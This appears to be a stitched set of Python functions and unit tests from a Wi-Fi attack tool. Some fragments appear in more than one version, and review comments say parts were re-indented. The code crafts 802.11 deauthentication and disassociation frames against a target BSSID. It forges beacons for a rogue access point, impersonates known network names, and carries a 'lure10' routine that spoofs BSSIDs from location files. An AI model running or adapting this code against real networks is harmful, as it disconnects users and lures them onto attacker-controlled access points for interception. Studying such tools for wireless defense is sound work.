def setUp(self):
    """
    Prepare the fixtures shared by the Deauth tests

    Builds a frame without a Dot11Beacon layer and two Deauth objects:
    deauth_obj0 is given a target BSSID, deauth_obj1 is given None
    """
    self.packet = (
        dot11.RadioTap()
        / dot11.Dot11()
        / dot11.Dot11Elt(ID='SSID', info="")
        / dot11.Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60")
        / dot11.Dot11Elt(ID='DSset', info='\x06')
    )

    # stand-in for the data object that Deauth receives
    field_names = ("target_ap_bssid target_ap_channel rogue_ap_mac args "
                   "target_ap_essid is_freq_hop_allowed")
    shared_data = collections.namedtuple("test", field_names)

    self.target_channel = "6"
    self.target_bssid = "BB:BB:BB:BB:BB:BB"
    self.rogue_mac = "CC:CC:CC:CC:CC:CC"
    self.target_essid = "Evil"

    # command line arguments are mocked with both options switched off
    self.args = mock.Mock()
    self.args.deauth_essid = False
    self.args.channel_monitor = False

    with_bssid = shared_data(self.target_bssid, self.target_channel,
                             self.rogue_mac, self.args,
                             self.target_essid, True)
    without_bssid = shared_data(None, self.target_channel,
                                self.rogue_mac, self.args,
                                self.target_essid, True)
    self.deauth_obj0 = deauth.Deauth(with_bssid)
    self.deauth_obj1 = deauth.Deauth(without_bssid)

    # test for --deauth-essid
    self.deauth_obj0._deauth_bssids = {}
    self.deauth_obj1._deauth_bssids = {}
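def get_packet(self, pkt):
    """
    Return the beacon frames to broadcast, crafting them on the first call

    On the first call with the lure10_exploit argument set, the selected
    area file is read line by line, the first word of every line is taken
    as a BSSID and one beacon frame with an empty SSID element is crafted
    for it

    :param self: A Lure10 object
    :param pkt: A scapy.layers.RadioTap object
    :type self: Lure10
    :type pkt: scapy.layers.RadioTap
    :return: self._packets_to_send, whose "*" key holds the list of
        crafted beacon frames
    :rtype: the type of self._packets_to_send (indexed by key here)
    .. warning: pkt is not used here but should not be removed since
        this prototype is a requirement
    """
    beacons = list()

    # make sure the "*" entry exists even when no frame gets crafted
    if self.first_run:
        self._packets_to_send["*"] = beacons

    # only run this code once
    if self.first_run and self.data.args.lure10_exploit:
        # NOTE(review): the file name is taken from the lure10_exploit
        # argument and appended to LOCS_DIR without normalisation;
        # confirm the argument parser limits it to the bundled area files
        area_file = constants.LOCS_DIR + self.data.args.lure10_exploit

        with open(area_file) as _file:
            for line in _file:
                # str.strip() returns a new string, so the result has to
                # be kept (the previous code discarded it)
                line = line.strip()
                # a blank line carries no BSSID
                if not line:
                    continue
                # the BSSID is the first word of the line
                bssid = line.split(" ", 1)[0]

                # craft the required packet parts
                frame_part_0 = dot11.RadioTap()
                frame_part_1 = dot11.Dot11(subtype=8,
                                           addr1=constants.WIFI_BROADCAST,
                                           addr2=bssid,
                                           addr3=bssid)
                frame_part_2 = dot11.Dot11Beacon(cap=0x2105)
                frame_part_3 = dot11.Dot11Elt(ID="SSID", info="")
                frame_part_4 = dot11.Dot11Elt(ID="Rates",
                                              info=constants.AP_RATES)
                frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7))

                # create a complete packet by combining the parts
                complete_frame = (frame_part_0 / frame_part_1 /
                                  frame_part_2 / frame_part_3 /
                                  frame_part_4 / frame_part_5)
                logger.debug("Add lure10-beacon frame with BSSID %s", bssid)
                # add the frame to the list
                beacons.append(complete_frame)

        # make sure this block is never executed again
        # NOTE(review): the listing this was taken from had lost its
        # indentation; the flag is cleared once the file has been read
        self.first_run = False
        self._packets_to_send["*"] = beacons
    return self._packets_to_send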
def test_is_packet_valid_packet_valid():
    """
    Test is_packet_valid function with a frame that carries a Dot11Beacon
    layer followed by SSID and DSset elements; True is expected
    """
    bssid = "FF:FF:FF:FF:FF:FF"
    header = dot11.Dot11(type=0, subtype=10, addr3=bssid)
    ssid_elt = dot11.Dot11Elt(ID=0, info="MY AP")
    dsset_elt = dot11.Dot11Elt(ID=3, info=chr(2))
    frame = (header / dot11.Dot11Beacon() / ssid_elt /
             dot11.Dot11Elt() / dsset_elt)

    outcome = recon.is_packet_valid(frame)
    assert outcome == True
def test_get_new_ap_packet_no_encryption(sniff):
    """
    Test get_new_ap function with a beacon whose capability field is
    0x0000; the last item of the returned tuple is expected to be False
    """
    essid = "MY_AP"
    chan = 2
    bssid = "FF:FF:FF:FF:FF:FF"

    header = dot11.Dot11(type=0, subtype=10, addr3=bssid)
    beacon = dot11.Dot11Beacon(cap=0x0000)
    ssid_elt = dot11.Dot11Elt(ID=0, info=essid)
    dsset_elt = dot11.Dot11Elt(ID=3, info=chr(chan))
    frame = header / beacon / ssid_elt / dot11.Dot11Elt() / dsset_elt

    # the sniff argument stands in for the capture and yields this frame
    sniff.return_value = [frame]

    expected = (essid, chan, bssid, False)
    assert recon.get_new_ap("wlan0") == expected
def test_get_new_ap_valid_packet(sniff):
    """
    Test get_new_ap function with a standard beacon whose capability
    field is 0x1111; the last item of the returned tuple is expected to
    be True
    """
    essid = "MY_AP"
    chan = 2
    bssid = "FF:FF:FF:FF:FF:FF"

    header = dot11.Dot11(type=0, subtype=10, addr3=bssid)
    beacon = dot11.Dot11Beacon(cap=0x1111)
    ssid_elt = dot11.Dot11Elt(ID=0, info=essid)
    dsset_elt = dot11.Dot11Elt(ID=3, info=chr(chan))
    frame = header / beacon / ssid_elt / dot11.Dot11Elt() / dsset_elt

    # the sniff argument stands in for the capture and yields this frame
    sniff.return_value = [frame]

    expected = (essid, chan, bssid, True)
    assert recon.get_new_ap("wlan0") == expected
def __init__(self, iface, essid, bssid, channel, beacon_interval_sec,
             packet_callback):
    """
    Store the access point parameters, pre-build the beacon frame and
    prepare the pyev loop, the signal watchers and the sniffing thread

    The sniffing thread is created as a daemon but is not started here
    """
    self.active = False
    self.iface = iface
    self.essid = essid
    self.bssid = bssid
    self.channel = channel
    self.beacon_interval_sec = beacon_interval_sec
    self.packet_callback = packet_callback
    self.start_time_secs = time.time()
    self.sc = 0
    self.sender = PacketSender(self.iface)

    # beacon template: broadcast destination, own BSSID as source,
    # followed by the SSID, channel, rates and RSN elements
    rsn_info = ('\x01\x00\x00\x0f\xac'
                '\x04\x01\x00\x00\x0f'
                '\xac\x04\x01\x00\x00'
                '\x0f\xac\x02\x00\x00')
    header = dot11.Dot11(addr1='ff:ff:ff:ff:ff:ff',
                         addr2=self.bssid,
                         addr3=self.bssid)
    self.beacon_packet = (
        header
        / dot11.Dot11Beacon(cap='ESS+privacy')
        / dot11.Dot11Elt(ID='SSID', info=self.essid)
        / dot11.Dot11Elt(ID='DSset', info=chr(self.channel))
        / dot11.Dot11Elt(ID='Rates', info='\x82\x84\x0b\x16')
        / dot11.Dot11Elt(ID='RSNinfo', info=rsn_info)
    )

    self.watchers = {"interval": None, "timeout": None}
    self.loop = pyev.Loop()

    # initialize and start the signal watchers; both are kept in
    # loop.data
    term_watcher = pyev.Signal(signal.SIGTERM, self.loop, self.sigterm_cb)
    term_watcher.start()
    int_watcher = pyev.Signal(signal.SIGINT, self.loop, self.sigint_cb)
    int_watcher.start()
    self.loop.data = [term_watcher, int_watcher]

    self.sniff_thread = Thread(target=self.sniff, kwargs={},
                               name='sniff-thread')
    self.sniff_thread.setDaemon(True)
def get_packet(self, pkt):
    """
    Craft the beacon frames on the first received packet.

    :param self: A Lure10 object.
    :param pkt: A scapy.layers.RadioTap object (not used here).
    :type self: Lure10
    :type pkt: scapy.layers.RadioTap
    :return: a tuple holding ["*"] and the list of crafted beacon
        frames; the list is empty on every call after the first
    :rtype: tuple(list, list)
    """
    crafted = []

    # NOTE(review): the nesting below is reconstructed from a listing
    # that had lost its indentation; confirm where beacons_num is set
    if self.first:
        if self.data.args.lure10_exploit:
            # NOTE(review): the file name comes from the lure10_exploit
            # argument and is appended to LOCS_DIR as given
            path = constants.LOCS_DIR + self.data.args.lure10_exploit
            with open(path) as handle:
                entries = [raw.strip() for raw in handle.readlines()]

            for entry in entries:
                # every entry holds "<bssid> <essid>"; only the BSSID is
                # used for the frame
                bssid, essid = entry.split(' ', 1)
                # Frequency for channel 7
                frequency = struct.pack("<h", 2407 + 7 * 5)
                ap_rates = "\x0c\x12\x18\x24\x30\x48\x60\x6c"

                radiotap = dot11.RadioTap(
                    len=18,
                    present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
                    notdecoded='\x00\x6c' + frequency +
                    '\xc0\x00\xc0\x01\x00\x00')
                header = dot11.Dot11(subtype=8,
                                     addr1='ff:ff:ff:ff:ff:ff',
                                     addr2=bssid,
                                     addr3=bssid)
                crafted.append(
                    radiotap
                    / header
                    / dot11.Dot11Beacon(cap=0x2105)
                    / dot11.Dot11Elt(ID='SSID', info="")
                    / dot11.Dot11Elt(ID='Rates', info=ap_rates)
                    / dot11.Dot11Elt(ID='DSset', info=chr(7)))
            self.beacons_num = len(crafted)
        self.first = False

    return (["*"], crafted)
def _get_known_beacons(self):
    """
    Read the ESSIDs listed in constants.KNOWN_WLANS_FILE and build one
    beacon frame for each of them

    Every frame uses the rogue AP MAC as source address and BSSID.
    Lines starting with "!" are skipped.

    :param self: A Beacons object
    :type self: Beacons
    :return: A list with all the beacon frames
    :rtype: list
    """
    rogue_mac = self.data.rogue_ap_mac
    frames = []

    with open(constants.KNOWN_WLANS_FILE) as wlans_file:
        for entry in wlans_file:
            if not entry.startswith("!"):
                # the ESSID is the line without its trailing whitespace
                name = entry.rstrip()

                header = dot11.Dot11(subtype=8,
                                     addr1=constants.WIFI_BROADCAST,
                                     addr2=rogue_mac,
                                     addr3=rogue_mac)
                frames.append(
                    dot11.RadioTap()
                    / header
                    / dot11.Dot11Beacon(cap=constants.KB_BEACON_CAP)
                    / dot11.Dot11Elt(ID="SSID", info=name)
                    / dot11.Dot11Elt(ID="Rates", info=constants.AP_RATES)
                    / dot11.Dot11Elt(ID="DSset", info=chr(7)))

    return frames
def add_lure10_beacons(self, area_file):
    """
    Craft one beacon frame per line of area_file and append each of them
    to self._deauthentication_packets

    :param self: the object owning _deauthentication_packets
    :param area_file: path of a file with one "<bssid> <essid>" entry
        per line
    :type area_file: str
    :return: None
    :rtype: None
    """
    with open(area_file) as handle:
        entries = [raw.strip() for raw in handle.readlines()]

    for entry in entries:
        # only the BSSID ends up in the frame, the SSID element is empty
        bssid, essid = entry.split(' ', 1)
        # Frequency for channel 7
        frequency = struct.pack("<h", 2407 + 7*5)
        ap_rates = "\x0c\x12\x18\x24\x30\x48\x60\x6c"

        radiotap = dot11.RadioTap(
            len=18,
            present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
            notdecoded='\x00\x6c' + frequency + '\xc0\x00\xc0\x01\x00\x00')
        header = dot11.Dot11(subtype=8,
                             addr1='ff:ff:ff:ff:ff:ff',
                             addr2=bssid,
                             addr3=bssid)
        self._deauthentication_packets.append(
            radiotap
            / header
            / dot11.Dot11Beacon(cap=0x2105)
            / dot11.Dot11Elt(ID='SSID', info="")
            / dot11.Dot11Elt(ID='Rates', info=ap_rates)
            / dot11.Dot11Elt(ID='DSset', info=chr(7)))
def test_get_packet_broadcast(self):
    """
    Test get_packet method for crafting the broadcast frames: a beacon
    from the target BSSID must yield a disassociation and a
    deauthentication frame addressed to broadcast on the target channel
    """
    # setup the packet
    sender = "00:00:00:00:00:00"
    receiver = "11:11:11:11:11:11"

    packet = (
        dot11.RadioTap()
        / dot11.Dot11()
        / dot11.Dot11Beacon()
        / dot11.Dot11Elt(ID='SSID', info="")
        / dot11.Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60")
        / dot11.Dot11Elt(ID='DSset', info='\x06')
    )
    packet.addr1 = receiver
    packet.addr2 = sender
    packet.addr3 = self.target_bssid
    packet.FCfield = 0x0

    # run the method
    pkts_to_send = self.deauth_obj0.get_packet(packet)

    message0 = "Failed to return an correct channel"
    message1 = "Failed to return an correct packets"

    # the target channel should be one key of the result
    self.assertEqual(self.target_channel in pkts_to_send, True, message0)

    # frame 0 is the disassociation packet (subtype 10) and frame 1 the
    # deauthentication packet (subtype 12)
    result = pkts_to_send[self.target_channel]
    for position, subtype in ((0, 10), (1, 12)):
        frame = result[position]
        self.assertEqual(frame.subtype, subtype, message1)
        self.assertEqual(frame.addr1, constants.WIFI_BROADCAST, message1)
        self.assertEqual(frame.addr2, self.target_bssid, message1)
        self.assertEqual(frame.addr3, self.target_bssid, message1)
def test_is_target_essid_non_decodable_error(self):
    """
    _is_target must return False for a beacon whose SSID element holds
    bytes that cannot be decoded as utf-8
    """
    undecodable = dot11.Dot11Elt(ID='SSID', info='\x99\x87\x33')
    frame = (dot11.RadioTap() / dot11.Dot11() / dot11.Dot11Beacon() /
             undecodable)
    frame.addr3 = "99:99:99:99:99:99"

    message = 'Fail to raise the UnicodeDecodeError for non-printable essid'
    self.assertEqual(self.deauth_obj0._is_target(frame), False, message)
def __init__(self, ap):
    """
    Set up the daemon thread and pre-build the beacon frame from the
    bssid, essid and channel of the given access point object
    """
    threading.Thread.__init__(self)
    self.ap = ap
    self.device = NetworkTransmitter(self.ap.iface)
    self.interval = 0.1

    # beacon template: broadcast destination, the AP's BSSID as source,
    # followed by the SSID, channel, rates and RSN elements
    rsn_info = ('\x01\x00\x00\x0f\xac'
                '\x04\x01\x00\x00\x0f'
                '\xac\x04\x01\x00\x00'
                '\x0f\xac\x02\x00\x00')
    header = dot11.Dot11(addr1='ff:ff:ff:ff:ff:ff',
                         addr2=self.ap.bssid,
                         addr3=self.ap.bssid)
    self.beacon_pckt = (
        header
        / dot11.Dot11Beacon(cap='ESS+privacy')
        / dot11.Dot11Elt(ID='SSID', info=self.ap.essid)
        / dot11.Dot11Elt(ID='DSset', info=chr(self.ap.channel))
        / dot11.Dot11Elt(ID='Rates', info='\x82\x84\x0b\x16')
        / dot11.Dot11Elt(ID='RSNinfo', info=rsn_info)
    )

    self.setDaemon(True)
def setUp(self):
    """
    Prepare the fixtures shared by the Deauth tests

    Builds a frame without a Dot11Beacon layer and two Deauth objects:
    deauth_obj0 is given a target BSSID, deauth_obj1 is given None
    """
    self.packet = (
        dot11.RadioTap()
        / dot11.Dot11()
        / dot11.Dot11Elt(ID='SSID', info="")
        / dot11.Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60")
        / dot11.Dot11Elt(ID='DSset', info='\x06')
    )

    # stand-in for the data object that Deauth receives
    shared_data = collections.namedtuple(
        "test", "target_ap_bssid target_ap_channel rogue_ap_mac")

    self.target_channel = "6"
    self.target_bssid = "BB:BB:BB:BB:BB:BB"
    self.rogue_mac = "CC:CC:CC:CC:CC:CC"

    with_bssid = shared_data(self.target_bssid, self.target_channel,
                             self.rogue_mac)
    without_bssid = shared_data(None, self.target_channel, self.rogue_mac)
    self.deauth_obj0 = deauth.Deauth(with_bssid)
    self.deauth_obj1 = deauth.Deauth(without_bssid)
def test_is_target_target_ap_bssid_true(self):
    """
    _is_target must return True for a beacon whose SSID equals the
    deauth_essid argument, here with a BSSID other than the target one
    """
    matching = dot11.Dot11Elt(ID='SSID', info="Evil")
    frame = (dot11.RadioTap() / dot11.Dot11() / dot11.Dot11Beacon() /
             matching)
    frame.addr3 = "99:99:99:99:99:99"

    # select the ESSID through the mocked arguments
    self.deauth_obj0._data.args.deauth_essid = "Evil"
    outcome = self.deauth_obj0._is_target(frame)

    message = "Fail to check the attacking essid: " + self.target_essid
    self.assertEqual(outcome, True, message)